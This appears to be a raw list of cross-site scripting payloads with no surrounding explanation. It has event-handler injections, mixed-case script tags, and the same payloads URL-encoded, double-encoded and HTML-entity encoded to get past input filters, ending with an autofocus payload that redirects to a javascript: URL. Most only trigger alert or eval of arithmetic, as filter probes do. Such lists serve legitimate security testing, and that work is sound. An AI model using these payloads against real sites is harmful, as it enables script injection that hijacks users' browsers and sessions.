\" onfocus=alert('00') \"
\" onhover=alert('01') \"
<scRipt>alert('02')</scRipt>
<img src=# onerror=alert('03') >
%5C%22%20onfocus%3Dalert%28%2704%27%29%20%5C%22
%5C%22%20onhover%3Dalert%28%2705%27%29%20%5C%22
%3CscRipt%3Ealert%28%2706%27%29%3C%2FscRipt%3E
%3Cimg%20src%3D%23%20onerror%3Dalert%28%2707%27%29%20%3E
&bsol;&quot; onfocus&equals;alert&lpar;&apos;08&apos;&rpar; &bsol;&quot;
&bsol;&quot; onhover&equals;alert&lpar;&apos;09&apos;&rpar; &bsol;&quot;
&lt;scRipt&gt;alert&lpar;&apos;10&apos;&rpar;&lt;&sol;scRipt&gt;
&lt;img src&equals;&num; onerror&equals;alert&lpar;&apos;11&apos;&rpar; &gt;
<Script>eval(2*3)</scripT>
%3CScript%3Eeval%283%2A3%29%3C%2FscripT%3E
%253CScript%253Eeval%25284%252A3%2529%253C%252FscripT%253E
&lt;&#83;&#99;&#114;&#105;&#112;&#116;&gt;&#101;&#118;&#97;&#108;&lpar;&#53;&ast;&#51;&rpar;&lt;&sol;&#115;&#99;&#114;&#105;&#112;&#84;&gt;
&amp;&#108;&#116;&semi;&amp;&num;&#56;&#51;&semi;&amp;&num;&#57;&#57;&semi;&amp;&num;&#49;&#49;&#52;&semi;&amp;&num;&#49;&#48;&#53;&semi;&amp;&num;&#49;&#49;&#50;&semi;&amp;&num;&#49;&#49;&#54;&semi;&amp;&#103;&#116;&semi;&amp;&num;&#49;&#48;&#49;&semi;&amp;&num;&#49;&#49;&#56;&semi;&amp;&num;&#57;&#55;&semi;&amp;&num;&#49;&#48;&#56;&semi;&amp;&#108;&#112;&#97;&#114;&semi;&amp;&num;&#53;&#52;&semi;&amp;&#97;&#115;&#116;&semi;&amp;&num;&#53;&#49;&semi;&amp;&#114;&#112;&#97;&#114;&semi;&amp;&#108;&#116;&semi;&amp;&#115;&#111;&#108;&semi;&amp;&num;&#49;&#49;&#53;&semi;&amp;&num;&#57;&#57;&semi;&amp;&num;&#49;&#49;&#52;&semi;&amp;&num;&#49;&#48;&#53;&semi;&amp;&num;&#49;&#49;&#50;&semi;&amp;&num;&#56;&#52;&semi;&amp;&#103;&#116;&semi;
&percnt;&#51;&#67;&#83;&#99;&#114;&#105;&#112;&#116;&percnt;&#51;&#69;&#101;&#118;&#97;&#108;&percnt;&#50;&#56;&#55;&percnt;&#50;&#65;&#51;&percnt;&#50;&#57;&percnt;&#51;&#67;&percnt;&#50;&#70;&#115;&#99;&#114;&#105;&#112;&#84;&percnt;&#51;&#69;
%26lt%3B%26%2383%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26gt%3B%26%23101%3B%26%23118%3B%26%2397%3B%26%23108%3B%26lpar%3B%26%2356%3B%26ast%3B%26%2351%3B%26rpar%3B%26lt%3B%26sol%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%2384%3B%26gt%3B
<java contentEditable='' autofocus='' onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1)